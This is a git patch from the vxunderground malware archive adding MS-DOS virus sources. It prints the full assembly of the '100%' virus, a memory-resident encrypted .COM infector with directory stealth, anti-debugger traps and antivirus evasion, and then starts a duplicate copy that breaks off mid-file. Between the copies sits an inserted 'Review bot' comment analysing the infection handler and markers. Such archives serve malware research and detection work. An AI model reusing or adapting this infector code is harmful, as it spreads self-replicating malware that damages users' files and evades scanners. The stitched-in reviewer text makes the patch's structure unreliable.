From 039994e413cd99cc08a46fbdc070ea62dcddbcaa Mon Sep 17 00:00:00 2001 
From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Tue, 12 Jan 2021 17:29:01 -0600 Subject: [PATCH] Add files via upload --- MSDOS/Virus.MSDOS.Unknown.100%-1.asm | 412 +++ MSDOS/Virus.MSDOS.Unknown.100%.asm | 412 +++ MSDOS/Virus.MSDOS.Unknown.1200.asm | 317 ++ MSDOS/Virus.MSDOS.Unknown.133.asm | 99 + MSDOS/Virus.MSDOS.Unknown.1575-e.asm | 983 ++++++ MSDOS/Virus.MSDOS.Unknown.1575.asm | 947 ++++++ MSDOS/Virus.MSDOS.Unknown.15apr.asm | 679 ++++ MSDOS/Virus.MSDOS.Unknown.1701-b.asm | 424 +++ MSDOS/Virus.MSDOS.Unknown.1701.asm | 427 +++ MSDOS/Virus.MSDOS.Unknown.1704.asm | 919 ++++++ MSDOS/Virus.MSDOS.Unknown.1717.asm | 664 ++++ MSDOS/Virus.MSDOS.Unknown.1888.asm | 1923 +++++++++++ MSDOS/Virus.MSDOS.Unknown.189.asm | 152 + MSDOS/Virus.MSDOS.Unknown.196.asm | 152 + MSDOS/Virus.MSDOS.Unknown.1963.asm | 1292 ++++++++ MSDOS/Virus.MSDOS.Unknown.1992.asm | 925 ++++++ MSDOS/Virus.MSDOS.Unknown.1st_star.asm | 161 + MSDOS/Virus.MSDOS.Unknown.1stvirus.asm | 165 + MSDOS/Virus.MSDOS.Unknown.203.asm | 187 ++ MSDOS/Virus.MSDOS.Unknown.23.asm | 37 + MSDOS/Virus.MSDOS.Unknown.25.asm | 30 + MSDOS/Virus.MSDOS.Unknown.299.asm | 150 + MSDOS/Virus.MSDOS.Unknown.29bytes.asm | 35 + MSDOS/Virus.MSDOS.Unknown.30.asm | 26 + MSDOS/Virus.MSDOS.Unknown.3066.asm | 1491 +++++++++ MSDOS/Virus.MSDOS.Unknown.334.asm | 252 ++ MSDOS/Virus.MSDOS.Unknown.382.asm | 243 ++ MSDOS/Virus.MSDOS.Unknown.386sx16.asm | 454 +++ MSDOS/Virus.MSDOS.Unknown.3apa3a.asm | 520 +++ MSDOS/Virus.MSDOS.Unknown.405.asm | 177 ++ MSDOS/Virus.MSDOS.Unknown.405_.asm | 206 ++ MSDOS/Virus.MSDOS.Unknown.4096.asm | 1902 +++++++++++ MSDOS/Virus.MSDOS.Unknown.43.asm | 37 + MSDOS/Virus.MSDOS.Unknown.44.asm | 99 + MSDOS/Virus.MSDOS.Unknown.468.asm | 257 ++ MSDOS/Virus.MSDOS.Unknown.50.asm | 33 + MSDOS/Virus.MSDOS.Unknown.512-x.asm | 304 ++ MSDOS/Virus.MSDOS.Unknown.512.asm | 269 ++ MSDOS/Virus.MSDOS.Unknown.541.asm | 446 +++ MSDOS/Virus.MSDOS.Unknown.560.asm | 464 +++ MSDOS/Virus.MSDOS.Unknown.583virus.asm | 324 ++ 
MSDOS/Virus.MSDOS.Unknown.7son.asm | 251 ++ MSDOS/Virus.MSDOS.Unknown.7son2.asm | 232 ++ MSDOS/Virus.MSDOS.Unknown.7son4.asm | 218 ++ MSDOS/Virus.MSDOS.Unknown.808.asm | 306 ++ MSDOS/Virus.MSDOS.Unknown.80hex.asm | 87 + MSDOS/Virus.MSDOS.Unknown.90210.asm | 377 +++ MSDOS/Virus.MSDOS.Unknown.911.asm | 631 ++++ MSDOS/Virus.MSDOS.Unknown._468.asm | 257 ++ MSDOS/Virus.MSDOS.Unknown.abdo.asm | 180 ++ MSDOS/Virus.MSDOS.Unknown.acidtrip.asm | 459 +++ MSDOS/Virus.MSDOS.Unknown.acme.asm | 300 ++ MSDOS/Virus.MSDOS.Unknown.acurev.asm | 165 + MSDOS/Virus.MSDOS.Unknown.addict1.asm | 191 ++ MSDOS/Virus.MSDOS.Unknown.addict2.asm | 251 ++ MSDOS/Virus.MSDOS.Unknown.addict3.asm | 265 ++ MSDOS/Virus.MSDOS.Unknown.addict4.asm | 224 ++ MSDOS/Virus.MSDOS.Unknown.addict5.asm | 530 ++++ MSDOS/Virus.MSDOS.Unknown.addict6.asm | 612 ++++ MSDOS/Virus.MSDOS.Unknown.addict7.asm | 813 +++++ MSDOS/Virus.MSDOS.Unknown.addict8.asm | 793 +++++ MSDOS/Virus.MSDOS.Unknown.addict9.asm | 743 +++++ MSDOS/Virus.MSDOS.Unknown.adrian.asm | 474 +++ MSDOS/Virus.MSDOS.Unknown.afrca109.asm | 99 + MSDOS/Virus.MSDOS.Unknown.ag.asm | 367 +++ MSDOS/Virus.MSDOS.Unknown.agiplan.asm | 1003 ++++++ MSDOS/Virus.MSDOS.Unknown.ah.asm | 415 +++ MSDOS/Virus.MSDOS.Unknown.ahadisk.asm | 4042 ++++++++++++++++++++++++ MSDOS/Virus.MSDOS.Unknown.aid(s).asm | 542 ++++ MSDOS/Virus.MSDOS.Unknown.aids.pas | 302 ++ MSDOS/Virus.MSDOS.Unknown.aircop.asm | 467 +++ MSDOS/Virus.MSDOS.Unknown.alameda.asm | 381 +++ MSDOS/Virus.MSDOS.Unknown.alchemy.asm | 1039 ++++++ MSDOS/Virus.MSDOS.Unknown.alemeda.asm | 381 +++ MSDOS/Virus.MSDOS.Unknown.alpha.asm | 890 ++++++ MSDOS/Virus.MSDOS.Unknown.altar.asm | 534 ++++ MSDOS/Virus.MSDOS.Unknown.ambul.asm | 523 +++ MSDOS/Virus.MSDOS.Unknown.ambul3.asm | 390 +++ MSDOS/Virus.MSDOS.Unknown.ambulanc.asm | 479 +++ MSDOS/Virus.MSDOS.Unknown.amst-299.asm | 133 + MSDOS/Virus.MSDOS.Unknown.amst-345.asm | 134 + MSDOS/Virus.MSDOS.Unknown.amst-740.asm | 128 + MSDOS/Virus.MSDOS.Unknown.amst-847.asm | 150 + 
MSDOS/Virus.MSDOS.Unknown.amst-852.asm | 155 + MSDOS/Virus.MSDOS.Unknown.andropin.asm | 408 +++ MSDOS/Virus.MSDOS.Unknown.angela.asm | 841 +++++ 86 files changed, 41158 insertions(+) create mode 100644 MSDOS/Virus.MSDOS.Unknown.100%-1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.100%.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1200.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.133.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1575-e.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1575.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.15apr.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1701-b.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1701.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1704.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1717.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1888.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.189.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.196.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1963.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1992.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1st_star.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.1stvirus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.203.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.23.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.25.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.299.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.29bytes.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.30.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.3066.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.334.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.382.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.386sx16.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.3apa3a.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.405.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.405_.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.4096.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.43.asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.44.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.468.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.50.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.512-x.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.512.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.541.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.560.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.583virus.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.7son.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.7son2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.7son4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.808.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.80hex.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.90210.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.911.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown._468.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.abdo.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.acidtrip.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.acme.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.acurev.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict1.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict2.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict4.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict5.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict6.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict7.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict8.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.addict9.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.adrian.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.afrca109.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ag.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.agiplan.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ah.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ahadisk.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.aid(s).asm create mode 100644 
MSDOS/Virus.MSDOS.Unknown.aids.pas create mode 100644 MSDOS/Virus.MSDOS.Unknown.aircop.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alameda.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alchemy.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alemeda.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.alpha.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.altar.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ambul.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ambul3.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.ambulanc.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-299.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-345.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-740.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-847.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.amst-852.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.andropin.asm create mode 100644 MSDOS/Virus.MSDOS.Unknown.angela.asm diff --git a/MSDOS/Virus.MSDOS.Unknown.100%-1.asm b/MSDOS/Virus.MSDOS.Unknown.100%-1.asm new file mode 100644 index 00000000..8115778f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.100%-1.asm 
@@ -0,0 +1,412 @@ +; =======================================================================> +; 100% By MnemoniX - 1994 +; +; This is a memory resident .COM infector which hides itself using +; directory stealth (11/12 and 4E/4F). To avoid setting heuristic +; flags in TBAV, it overwrites part of the decryption routine with +; garbage and adds instructions to repair it on the header of the +; program. Runs through TBAV flawlessly. Examine it in action and +; observe for yourself. +; +; This virus also includes debugger traps to thwart tracing. +; =======================================================================> + +PING equ 30F4h ; give INT 21 this value ... +PONG equ 0DEADh ; if this returns we're res. +ID equ '%0' ; ID marker +HEADER_SIZE equ 22 ; 22 - byte .COM header +MARKER equ 20 ; marker at offset 20 + +code segment byte public 'code' + org 100h + assume cs:code + +start: + db 17 dup (90h) ; simulate infected program + jmp virus_begin ; a real host program will + dw ID ; have some MOVs at the +host: + db 0CDh,20h ; beginning + db 20 dup(90h) + +virus_begin: + db 0BBh ; mov bx,offset viral_code +code_offset dw offset virus_code + db 0B8h ; mov ax,cipher +cipher dw 0 + mov cx,VIRUS_SIZE / 2 + 1 ; mov cx,length of code +decrypt: + xor [bx],ax ; in real infections, + ror ax,1 ; portions of this code + inc bx ; will be replaced with + inc bx ; dummy bytes, which will be + loop decrypt ; fixed up by the header. + ; this complicates scanning +virus_code: + call $+3 ; BP is instruction pointer + pop bp + sub bp,offset $-1 + + xor ax,ax ; anti-trace ... + mov es,ax ; set interrupts 0-3 to point + mov di,ax ; to The Great Void in high + dec ax ; memory ... + mov cl,8 + rep movsw + + mov ax,PING ; test for residency + int 21h + cmp bx,PONG + je installed + + in al,21h ; another anti-debugger + xor al,2 ; routine ... 
lock out + out 21h,al ; keyboard + xor al,2 + out 21h,al + + mov ax,ds ; not resident - install + dec ax ; ourselves in memory + mov ds,ax + + sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1 + sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1 + mov ax,ds:[12h] + mov ds,ax + + sub ax,15 + mov es,ax + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],8 + mov word ptr ds:[3],(MEM_SIZE + 15) / 16 + + push cs ; now move virus into memory + pop ds + mov di,100h + mov cx,(offset virus_end - offset start) / 2 + lea si,[bp + offset start] + rep movsw + + xor ax,ax ; change interrupt 21 to point + mov ds,ax ; to ourselves + + mov si,21h * 4 + mov di,offset old_int_21 ; (saving original int 21) + movsw + movsw + + mov word ptr ds:[si - 2],0 ; anti-trace - temporarily + ; kill int 21 + mov ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es + +installed: + push cs ; restore segregs + push cs + pop ds + pop es + lea si,[bp + offset host] ; and restore original + mov di,100h ; bytes of program + push di + mov cx,HEADER_SIZE + rep movsb + + ret ; and we're done + +; Interrupt 21 handler - trap file execute, search, open, read, and +; moves to the end of the file. + +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,30F4h ; residency test? + je test_pass ; yes .... + + cmp ax,4B00h ; file execute? + jne stealth + jmp execute ; yes, infect ... + +stealth: + cmp ah,11h ; directory stealth + je dir_stealth_1 + cmp ah,12h + je dir_stealth_1 + + cmp ah,4Eh ; more directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +test_pass: + call int_21 ; get real DOS version + mov bx,PONG ; and give pass signal + iret + +dir_stealth_1: + call int_21 ; perform directory search + cmp al,-1 ; no more files? 
+ jne check_file + iret ; no, skip it +check_file: + push ax bx es ; check file for infection + + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 + +no_ext_FCB: + cmp word ptr es:[bx + 9],'OC' + jne fixed ; not .COM file, ignore + + mov ax,word ptr es:[bx + 17h] + and al,31 ; check seconds - + cmp al,26 ; if 52, infected + jne fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Fh],0 +fixed: + pop es bx ax + iret + +dir_stealth_2: + call int_21 ; perform file search + jnc check_file_2 ; if found, proceed + retf 2 ; nope, leave +check_file_2: + push ax bx si es + + mov ah,2Fh ; find DTA + int 21h + + xor si,si ; verify that this is a .COM +find_ext: + cmp byte ptr es:[bx + si],'.' + je found_ext + inc si + jmp find_ext +found_ext: + cmp word ptr es:[bx + si + 1],'OC' + jne fixed_2 ; if not .COM, skip + + mov ax,word ptr es:[bx + 16h] + and al,31 ; check for infection marker + cmp al,26 + jne fixed_2 ; not found, skip + + sub word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Ch],0 +fixed_2: + pop es si bx ax ; done + clc + retf 2 + +execute: + push ax bx cx dx di ds es ; file execute ... check + ; if uninfected .COM file, + mov ax,3D00h ; and if so, infect + call int_21 + jnc read_header + jmp exec_exit ; can't open, leave + +read_header: + xchg ax,bx + + push bx ; save file handle + mov ax,1220h ; get system file table + int 2Fh ; entry + + nop ; remove this if you don't + ; mind scanning as [512] under + ; SCAN ... + + mov bl,es:[di] ; get number of the SFT + mov ax,1216h ; for this handle + int 2Fh ; ES:DI now points to SFT + pop bx + + mov word ptr es:[di + 2],2 ; change open mode to R/W + + push word ptr es:[di + 13] ; save file date + push word ptr es:[di + 15] ; and file time + + mov ax,word ptr es:[di + 11h] + cmp ax,62579 - VIRUS_SIZE ; too big? + je exec_close + + cmp ax,22 ; too small? 
+ jb exec_close + + add ax,HEADER_SIZE - 3 ; calculate virus offset + + + push cs + pop ds + + mov ds:virus_offset,ax + + mov ah,3Fh ; read header of file + mov cx,HEADER_SIZE ; to check for infection + mov dx,offset read_buffer + call int_21 + + cmp word ptr ds:read_buffer,'ZM' + je exec_close ; don't infect .EXE + + cmp word ptr ds:read_buffer[MARKER],ID ; if infected + je exec_close ; already, skip it + + mov ax,4202h ; move to end of file + call move_ptr_write + + mov dx,offset read_buffer ; and save header + call int_21 + + call encrypt_code ; encrypt the virus code + call create_header ; and create unique header + + mov ah,40h + mov cx,VIRUS_SIZE ; write virus code to file + mov dx,offset encrypt_buffer + int 21h + + mov ax,4200h ; back to beginning of file + call move_ptr_write + + mov dx,offset new_header ; write new header + call int_21 + + pop dx ; restore file date & time + pop cx + and cl,0E0h ; but with timestamp + or cl,26 + mov ax,5701h + int 21h + + mov ah,3Eh ; close file + int 21h + +exec_exit: + pop es ds di dx cx bx ax + jmp int_21_exit + +move_ptr_write: + cwd ; move file pointer + xor cx,cx + int 21h + mov cx,HEADER_SIZE ; and prepare for write + mov ah,40h ; to file + ret + +exec_close: + pop ax ax ; clean off stack + mov ah,3Eh ; and close + int 21h + jmp exec_exit + +encrypt_code proc near + + push si es + + push cs + pop es + + xor ah,ah ; get random no. 
+ int 1Ah ; and store in decryption + mov cipher,dx ; module + + mov ax,ds:virus_offset + add ax,DECRYPTOR_SIZE + 103h + mov code_offset,ax + + mov si,offset virus_begin ; first store header + mov di,offset encrypt_buffer + mov cx,DECRYPTOR_SIZE + rep movsb ; (unencryted) + + mov cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code + +encrypt: + lodsw ; simple encryption routine + xor ax,dx + ror dx,1 + stosw + loop encrypt + + pop es si + ret + +encrypt_code endp + +create_header proc near + + mov ax,ds:virus_offset ; fix up addresses in new + add ax,103h + (offset decrypt - offset virus_begin) + mov ds:mov_1,ax ; header + inc ax + inc ax + mov ds:mov_2,ax + + xor ah,ah ; fill in useless MOVs + int 1Ah ; with random bytes + mov ds:mov_al,cl + mov ds:mov_ax,dx + + push es cs + pop es + mov di,offset encrypt_buffer + add di,offset decrypt - offset virus_begin + mov ax,dx ; now fill decryption module + neg ax ; with some garbage + stosw + rol ax,1 + stosw + pop es + + sub word ptr ds:virus_offset,17 ; fix up JMP instruction + + ret ; done +create_header endp + +new_header db 0C7h,06 +mov_1 dw 00 + db 31h,07 ; first MOV 6 + db 0B0h +mov_al db 00 ; a nothing MOV AL, 2 + db 0C7h,06 +mov_2 dw 00 + db 0D1h,0C8h ; second MOV 6 + db 0B8h +mov_ax dw 00 ; a nothing MOV AX, 3 + db 0E9h ; jump instruction 1 +virus_offset dw 0 ; virus offset 2 + dw ID ; ID marker 2 + ; total bytes = 22 + +sig db '[100%] By MnemoniX 1994',0 + +virus_end: + +VIRUS_SIZE equ offset virus_end - offset virus_begin + +read_buffer dw HEADER_SIZE dup (?) ; storage for orig header +encrypt_buffer dw VIRUS_SIZE dup (?) ; storage for encrypted virus + +heap_end: + +MEM_SIZE equ offset heap_end - offset start +DECRYPTOR_SIZE equ offset virus_code - offset virus_begin +ENCRYPTED_SIZE equ offset virus_end - offset virus_code + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.100%.asm b/MSDOS/Virus.MSDOS.Unknown.100%.asm new file mode 100644 index 00000000..8115778f --- /dev/null 
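Review bot: The comment introducing the handler, `; Interrupt 21 handler - trap file execute, search, open, read, and moves to the end of the file.`, overstates what `new_int_21` does: the dispatch that follows only matches AX=30F4h (the residency probe, answered with BX=0DEADh in `test_pass`), AX=4B00h (infect on exec), and AH=11h/12h and AH=4Eh/4Fh (directory-size stealth); every other function, including open, read and lseek, falls through the far jump at `int_21_exit`. The `; too big?` check is misdescribed as well — `cmp ax,62579 - VIRUS_SIZE` is followed by `je exec_close`, so only a file of exactly that length is skipped. For an archive read by analysts I would replace the handler comment with `; INT 21h hook: AX=30F4h residency probe (BX=0DEADh), AX=4B00h infect-on-exec, AH=11h/12h and 4Eh/4Fh hide VIRUS_SIZE+HEADER_SIZE from directory listings; all else passes through`, and add a line recording the two infection markers the code keys on: the word `'%0'` at header offset 20 (`cmp word ptr ds:read_buffer[MARKER],ID`) and a file-time seconds field of 26, i.e. 52 s, written by `or cl,26` before the 5701h call.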
+++ b/MSDOS/Virus.MSDOS.Unknown.100%.asm 
@@ -0,0 +1,412 @@ +; =======================================================================> +; 100% By MnemoniX - 1994 +; +; This is a memory resident .COM infector which hides itself using +; directory stealth (11/12 and 4E/4F). To avoid setting heuristic +; flags in TBAV, it overwrites part of the decryption routine with +; garbage and adds instructions to repair it on the header of the +; program. Runs through TBAV flawlessly. Examine it in action and +; observe for yourself. +; +; This virus also includes debugger traps to thwart tracing. +; =======================================================================> + +PING equ 30F4h ; give INT 21 this value ... +PONG equ 0DEADh ; if this returns we're res. +ID equ '%0' ; ID marker +HEADER_SIZE equ 22 ; 22 - byte .COM header +MARKER equ 20 ; marker at offset 20 + +code segment byte public 'code' + org 100h + assume cs:code + +start: + db 17 dup (90h) ; simulate infected program + jmp virus_begin ; a real host program will + dw ID ; have some MOVs at the +host: + db 0CDh,20h ; beginning + db 20 dup(90h) + +virus_begin: + db 0BBh ; mov bx,offset viral_code +code_offset dw offset virus_code + db 0B8h ; mov ax,cipher +cipher dw 0 + mov cx,VIRUS_SIZE / 2 + 1 ; mov cx,length of code +decrypt: + xor [bx],ax ; in real infections, + ror ax,1 ; portions of this code + inc bx ; will be replaced with + inc bx ; dummy bytes, which will be + loop decrypt ; fixed up by the header. + ; this complicates scanning +virus_code: + call $+3 ; BP is instruction pointer + pop bp + sub bp,offset $-1 + + xor ax,ax ; anti-trace ... + mov es,ax ; set interrupts 0-3 to point + mov di,ax ; to The Great Void in high + dec ax ; memory ... + mov cl,8 + rep movsw + + mov ax,PING ; test for residency + int 21h + cmp bx,PONG + je installed + + in al,21h ; another anti-debugger + xor al,2 ; routine ... 
lock out + out 21h,al ; keyboard + xor al,2 + out 21h,al + + mov ax,ds ; not resident - install + dec ax ; ourselves in memory + mov ds,ax + + sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1 + sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1 + mov ax,ds:[12h] + mov ds,ax + + sub ax,15 + mov es,ax + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],8 + mov word ptr ds:[3],(MEM_SIZE + 15) / 16 + + push cs ; now move virus into memory + pop ds + mov di,100h + mov cx,(offset virus_end - offset start) / 2 + lea si,[bp + offset start] + rep movsw + + xor ax,ax ; change interrupt 21 to point + mov ds,ax ; to ourselves + + mov si,21h * 4 + mov di,offset old_int_21 ; (saving original int 21) + movsw + movsw + + mov word ptr ds:[si - 2],0 ; anti-trace - temporarily + ; kill int 21 + mov ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es + +installed: + push cs ; restore segregs + push cs + pop ds + pop es + lea si,[bp + offset host] ; and restore original + mov di,100h ; bytes of program + push di + mov cx,HEADER_SIZE + rep movsb + + ret ; and we're done + +; Interrupt 21 handler - trap file execute, search, open, read, and +; moves to the end of the file. + +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,30F4h ; residency test? + je test_pass ; yes .... + + cmp ax,4B00h ; file execute? + jne stealth + jmp execute ; yes, infect ... + +stealth: + cmp ah,11h ; directory stealth + je dir_stealth_1 + cmp ah,12h + je dir_stealth_1 + + cmp ah,4Eh ; more directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +test_pass: + call int_21 ; get real DOS version + mov bx,PONG ; and give pass signal + iret + +dir_stealth_1: + call int_21 ; perform directory search + cmp al,-1 ; no more files? 
+ jne check_file + iret ; no, skip it +check_file: + push ax bx es ; check file for infection + + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 + +no_ext_FCB: + cmp word ptr es:[bx + 9],'OC' + jne fixed ; not .COM file, ignore + + mov ax,word ptr es:[bx + 17h] + and al,31 ; check seconds - + cmp al,26 ; if 52, infected + jne fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Fh],0 +fixed: + pop es bx ax + iret + +dir_stealth_2: + call int_21 ; perform file search + jnc check_file_2 ; if found, proceed + retf 2 ; nope, leave +check_file_2: + push ax bx si es + + mov ah,2Fh ; find DTA + int 21h + + xor si,si ; verify that this is a .COM +find_ext: + cmp byte ptr es:[bx + si],'.' + je found_ext + inc si + jmp find_ext +found_ext: + cmp word ptr es:[bx + si + 1],'OC' + jne fixed_2 ; if not .COM, skip + + mov ax,word ptr es:[bx + 16h] + and al,31 ; check for infection marker + cmp al,26 + jne fixed_2 ; not found, skip + + sub word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE + sbb word ptr es:[bx + 1Ch],0 +fixed_2: + pop es si bx ax ; done + clc + retf 2 + +execute: + push ax bx cx dx di ds es ; file execute ... check + ; if uninfected .COM file, + mov ax,3D00h ; and if so, infect + call int_21 + jnc read_header + jmp exec_exit ; can't open, leave + +read_header: + xchg ax,bx + + push bx ; save file handle + mov ax,1220h ; get system file table + int 2Fh ; entry + + nop ; remove this if you don't + ; mind scanning as [512] under + ; SCAN ... + + mov bl,es:[di] ; get number of the SFT + mov ax,1216h ; for this handle + int 2Fh ; ES:DI now points to SFT + pop bx + + mov word ptr es:[di + 2],2 ; change open mode to R/W + + push word ptr es:[di + 13] ; save file date + push word ptr es:[di + 15] ; and file time + + mov ax,word ptr es:[di + 11h] + cmp ax,62579 - VIRUS_SIZE ; too big? + je exec_close + + cmp ax,22 ; too small? 
+ jb exec_close + + add ax,HEADER_SIZE - 3 ; calculate virus offset + + + push cs + pop ds + + mov ds:virus_offset,ax + + mov ah,3Fh ; read header of file + mov cx,HEADER_SIZE ; to check for infection + mov dx,offset read_buffer + call int_21 + + cmp word ptr ds:read_buffer,'ZM' + je exec_close ; don't infect .EXE + + cmp word ptr ds:read_buffer[MARKER],ID ; if infected + je exec_close ; already, skip it + + mov ax,4202h ; move to end of file + call move_ptr_write + + mov dx,offset read_buffer ; and save header + call int_21 + + call encrypt_code ; encrypt the virus code + call create_header ; and create unique header + + mov ah,40h + mov cx,VIRUS_SIZE ; write virus code to file + mov dx,offset encrypt_buffer + int 21h + + mov ax,4200h ; back to beginning of file + call move_ptr_write + + mov dx,offset new_header ; write new header + call int_21 + + pop dx ; restore file date & time + pop cx + and cl,0E0h ; but with timestamp + or cl,26 + mov ax,5701h + int 21h + + mov ah,3Eh ; close file + int 21h + +exec_exit: + pop es ds di dx cx bx ax + jmp int_21_exit + +move_ptr_write: + cwd ; move file pointer + xor cx,cx + int 21h + mov cx,HEADER_SIZE ; and prepare for write + mov ah,40h ; to file + ret + +exec_close: + pop ax ax ; clean off stack + mov ah,3Eh ; and close + int 21h + jmp exec_exit + +encrypt_code proc near + + push si es + + push cs + pop es + + xor ah,ah ; get random no. 
+ int 1Ah ; and store in decryption + mov cipher,dx ; module + + mov ax,ds:virus_offset + add ax,DECRYPTOR_SIZE + 103h + mov code_offset,ax + + mov si,offset virus_begin ; first store header + mov di,offset encrypt_buffer + mov cx,DECRYPTOR_SIZE + rep movsb ; (unencryted) + + mov cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code + +encrypt: + lodsw ; simple encryption routine + xor ax,dx + ror dx,1 + stosw + loop encrypt + + pop es si + ret + +encrypt_code endp + +create_header proc near + + mov ax,ds:virus_offset ; fix up addresses in new + add ax,103h + (offset decrypt - offset virus_begin) + mov ds:mov_1,ax ; header + inc ax + inc ax + mov ds:mov_2,ax + + xor ah,ah ; fill in useless MOVs + int 1Ah ; with random bytes + mov ds:mov_al,cl + mov ds:mov_ax,dx + + push es cs + pop es + mov di,offset encrypt_buffer + add di,offset decrypt - offset virus_begin + mov ax,dx ; now fill decryption module + neg ax ; with some garbage + stosw + rol ax,1 + stosw + pop es + + sub word ptr ds:virus_offset,17 ; fix up JMP instruction + + ret ; done +create_header endp + +new_header db 0C7h,06 +mov_1 dw 00 + db 31h,07 ; first MOV 6 + db 0B0h +mov_al db 00 ; a nothing MOV AL, 2 